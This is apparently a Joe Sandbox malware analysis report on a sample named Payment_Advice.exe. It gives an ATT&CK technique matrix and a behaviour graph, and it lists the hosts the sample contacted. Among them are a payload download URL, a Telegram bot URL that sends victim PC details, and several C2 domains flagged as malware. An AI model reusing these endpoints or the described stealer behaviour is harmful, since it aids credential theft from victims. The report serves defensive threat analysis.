            CredentialsDomainsDefault Accounts1
            Native API
            1
            Windows Service
            1
            Windows Service
            2
            Obfuscated Files or Information
            LSASS Memory116
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts3
            PowerShell
            1
            Registry Run Keys / Startup Folder
            111
            Process Injection
            1
            Software Packing
            Security Account Manager1
            Query Registry
            SMB/Windows Admin Shares1
            Email Collection
            11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Registry Run Keys / Startup Folder
            1
            DLL Side-Loading
            NTDS21
            Security Software Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading
            LSA Secrets1
            Process Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
            Virtualization/Sandbox Evasion
            Cached Domain Credentials31
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
            Process Injection
            DCSync1
            Application Window Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            System Network Configuration Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1481503 Sample: Payment_Advice.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 34 reallyfreegeoip.org 2->34 36 api.telegram.org 2->36 38 5 other IPs or domains 2->38 44 Found malware configuration 2->44 46 Antivirus detection for URL or domain 2->46 48 Multi AV Scanner detection for dropped file 2->48 54 8 other signatures 2->54 8 Payment_Advice.exe 1 19 2->8         started        signatures3 50 Tries to detect the country of the analysis system (by using the IP) 34->50 52 Uses the Telegram API (likely for C&C communication) 36->52 process4 file5 22 C:\Users\user\AppData\...\Fillock161.Sys, ASCII 8->22 dropped 56 Suspicious powershell command line found 8->56 58 Sample is not signed and drops a device driver 8->58 12 powershell.exe 20 8->12         started        signatures6 process7 file8 24 C:\Users\user\AppData\...\Payment_Advice.exe, PE32 12->24 dropped 26 C:\...\Payment_Advice.exe:Zone.Identifier, ASCII 12->26 dropped 60 Writes to foreign memory regions 12->60 62 Found suspicious powershell code related to unpacking or dynamic code loading 12->62 64 Powershell creates an autostart link 12->64 66 Powershell drops PE file 12->66 16 wab.exe 15 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 28 electromac.com.bo 192.185.142.133, 49731, 49732, 587 UNIFIEDLAYER-AS-1US United States 16->28 30 api.telegram.org 149.154.167.220, 443, 49730 TELEGRAMRU United Kingdom 16->30 32 3 other IPs or domains 16->32 40 Tries to steal Mail credentials (via file / registry access) 16->40 42 Tries to harvest and steal browser information (history, passwords, etc) 16->42 signatures12

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Payment_Advice.exe34%ReversingLabsWin32.Trojan.Generic
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\Payment_Advice.exe34%ReversingLabsWin32.Trojan.Generic
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://contoso.com/License0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            https://aka.ms/pscore6lB0%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://crl.micro0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://www.office.com/lB0%Avira URL Cloudsafe
            https://api.telegram.org/bot0%Avira URL Cloudsafe
            https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.binN0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://api.telegram.org0%Avira URL Cloudsafe
            http://r10.i.lencr.org/010%Avira URL Cloudsafe
            http://varders.kozow.com:80810%Avira URL Cloudsafe
            https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.bin0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
            http://mail.electromac.com.bo0%Avira URL Cloudsafe
            https://www.office.com/0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://electromac.com.bo0%Avira URL Cloudsafe
            https://chrome.google.com/webstore?hl=enlB0%Avira URL Cloudsafe
            http://r10.o.lencr.org0#0%Avira URL Cloudsafe
            https://www.reap.skyestates.com.mt/0%Avira URL Cloudsafe
            https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://aborters.duckdns.org:8081100%Avira URL Cloudmalware
            http://51.38.247.67:8081/_send_.php?L0%Avira URL Cloudsafe
            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2026/07/2024%20/%2004:58:36%0D%0ACountry%20Name:%20%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20a0%Avira URL Cloudsafe
            http://anotherarmy.dns.army:8081100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            www.reap.skyestates.com.mt
            108.167.181.251
            truefalse
              unknown
              reallyfreegeoip.org
              188.114.97.3
              truetrue
                unknown
                electromac.com.bo
                192.185.142.133
                truetrue
                  unknown
                  api.telegram.org
                  149.154.167.220
                  truetrue
                    unknown
                    checkip.dyndns.com
                    193.122.6.168
                    truefalse
                      unknown
                      mail.electromac.com.bo
                      unknown
                      unknowntrue
                        unknown
                        checkip.dyndns.org
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.binfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://checkip.dyndns.org/false
                          • URL Reputation: safe
                          unknown
                          https://reallyfreegeoip.org/xml/8.46.123.33false
                          • URL Reputation: safe
                          unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2026/07/2024%20/%2004:58:36%0D%0ACountry%20Name:%20%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabwab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://duckduckgo.com/ac/?q=wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.binNwab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://r10.i.lencr.org/01wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.telegram.orgwab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.telegram.org/botwab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://contoso.com/Licensepowershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.office.com/lBwab.exe, 00000005.00000002.3299130843.000000002186A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://chrome.google.com/webstore?hl=enwab.exe, 00000005.00000002.3299130843.000000002183E000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002182F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002186F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://varders.kozow.com:8081wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://mail.electromac.com.bowab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2431221389.0000000004F81000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://x1.c.lencr.org/0wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://x1.i.lencr.org/0wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://contoso.com/powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://chrome.google.com/webstore?hl=enlBwab.exe, 00000005.00000002.3299130843.0000000021839000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2431221389.0000000004F81000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://reallyfreegeoip.org/xml/wab.exe, 00000005.00000002.3299130843.00000000216D0000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.office.com/wab.exe, 00000005.00000002.3299130843.000000002186F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.google.com/images/branding/product/ico/googleg_lodp.icowab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://contoso.com/Iconpowershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.reap.skyestates.com.mt/wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://r10.o.lencr.org0#wab.exe, 00000005.00000002.3307034210.0000000023B07000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217C8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://checkip.dyndns.orgwab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://electromac.com.bowab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000217D5000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://nsis.sf.net/NSIS_ErrorErrorPayment_Advice.exe, Payment_Advice.exe.2.drfalse
                          • URL Reputation: safe
                          unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.ecosia.org/newtab/wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://aborters.duckdns.org:8081wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://ac.ecosia.org/autocomplete?q=wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20awab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://51.38.247.67:8081/_send_.php?Lwab.exe, 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://crl.micropowershell.exe, 00000002.00000002.2435366329.0000000007679000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://reallyfreegeoip.org/xml/8.46.123.33$wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000216FA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://anotherarmy.dns.army:8081wab.exe, 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://reallyfreegeoip.orgwab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000216D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          149.154.167.220
                          api.telegram.orgUnited Kingdom
                          62041TELEGRAMRUtrue
                          192.185.142.133
                          electromac.com.boUnited States
                          46606UNIFIEDLAYER-AS-1UStrue
                          188.114.97.3
                          reallyfreegeoip.orgEuropean Union
                          13335CLOUDFLARENETUStrue
                          193.122.6.168
                          checkip.dyndns.comUnited States
                          31898ORACLE-BMC-31898USfalse
                          108.167.181.251
                          www.reap.skyestates.com.mtUnited States
                          46606UNIFIEDLAYER-AS-1USfalse
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1481503
                          Start date and time:2024-07-25 10:17:50 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 7m 30s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Payment_Advice.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@6/11@5/5
                          EGA Information:
                          • Successful, ratio: 66.7%
                          HCA Information:
                          • Successful, ratio: 96%
                          • Number of executed functions: 175
                          • Number of non-executed functions: 53
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target powershell.exe, PID 5884 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: Payment_Advice.exe
                          TimeTypeDescription
                          04:18:41API Interceptor43x Sleep call for process: powershell.exe modified
                          04:19:23API Interceptor373582x Sleep call for process: wab.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          149.154.167.220Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            Payment Slip.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                              Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                                  Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                                    Lisect_AVT_24003_G1B_33.exeGet hashmaliciousUnknownBrowse
                                      DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        Install.msiGet hashmaliciousUnknownBrowse
                                          rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                            z23RevisedInvoice.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                              192.185.142.133Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                188.114.97.3HSBC_PAYMENT.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                • bshd1.shop/OP341/index.php
                                                ESPLS-RFQ_2400282.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                • crst2.shop/HM341/index.php
                                                PMTI00002112.exeGet hashmaliciousAzorultBrowse
                                                • bshd1.shop/OP341/index.php
                                                ESPLS-RFQ_2400282.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                • crst2.shop/HM341/index.php
                                                MB9901717-PDF.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                • vlha.shop/LB341/index.php
                                                http://kjhjgfhjkfkhkhnjrgeiur97r0rg4.pages.dev/shawerrorGet hashmaliciousHTMLPhisherBrowse
                                                • kjhjgfhjkfkhkhnjrgeiur97r0rg4.pages.dev/shawerror
                                                Quotation.xlsGet hashmaliciousRemcosBrowse
                                                • tny.wtf/jk8Z5I
                                                NUEVO ORDEN01_202407238454854.pdf.exeGet hashmaliciousFormBookBrowse
                                                • www.010101-11122-2222.cloud/rn94/?ndsLnTq=grMJGHTOpxQfD2iixWctBZvhCYtmqSbLUJDCoaQDnQJ3Rh8vFQmgv7kvDLvYcoaVSk1M&pPO=DFQxUrcpRxVH
                                                DRAFT AWB and DRAFT Commercial invoice.xlsGet hashmaliciousRemcosBrowse
                                                • tny.wtf/cyd
                                                QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                • filetransfer.io/data-package/4jaIXkvS/download
                                                193.122.6.168Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                Payment Slip.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                Confirmation transfer Copy AGS # 24-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                Orden de Compra..exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                Fekdjuvq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                neworder.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                ORDER INQUIRY_QTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                QvS0a5bvCMM8EUj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                reallyfreegeoip.orgLPO-9180155-PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 188.114.97.3
                                                Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 188.114.96.3
                                                Payment Slip.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 188.114.97.3
                                                Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 188.114.96.3
                                                Confirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.97.3
                                                DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                Deye Union - PO # 23081377.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.97.3
                                                rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.97.3
                                                z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 172.67.177.134
                                                rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.96.3
                                                checkip.dyndns.comLPO-9180155-PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 132.226.247.73
                                                Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 193.122.6.168
                                                Payment Slip.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 193.122.6.168
                                                Torpernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 158.101.44.242
                                                Confirmation Order.jsGet hashmaliciousSnake KeyloggerBrowse
                                                • 132.226.247.73
                                                DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 158.101.44.242
                                                Confirmation transfer Note AGS # 22-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 158.101.44.242
                                                Deye Union - PO # 23081377.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 132.226.247.73
                                                rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 158.101.44.242
                                                z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 158.101.44.242
                                                www.reap.skyestates.com.mtHSBC_PAYMENT.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                • 108.167.181.251
                                                HSBC_PAYMENT.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                • 108.167.181.251
                                                LPO-9180155-PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 108.167.181.251
                                                ESPLS-RFQ_2400282.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                • 108.167.181.251
                                                PMTI00002112.exeGet hashmaliciousAzorultBrowse
                                                • 108.167.181.251
                                                Apixaban _August 2024.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                • 108.167.181.251
                                                Apixaban - August 2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 108.167.181.251
                                                Payment Slip.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 108.167.181.251
                                                ESPLS-RFQ_2400282.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                • 108.167.181.251
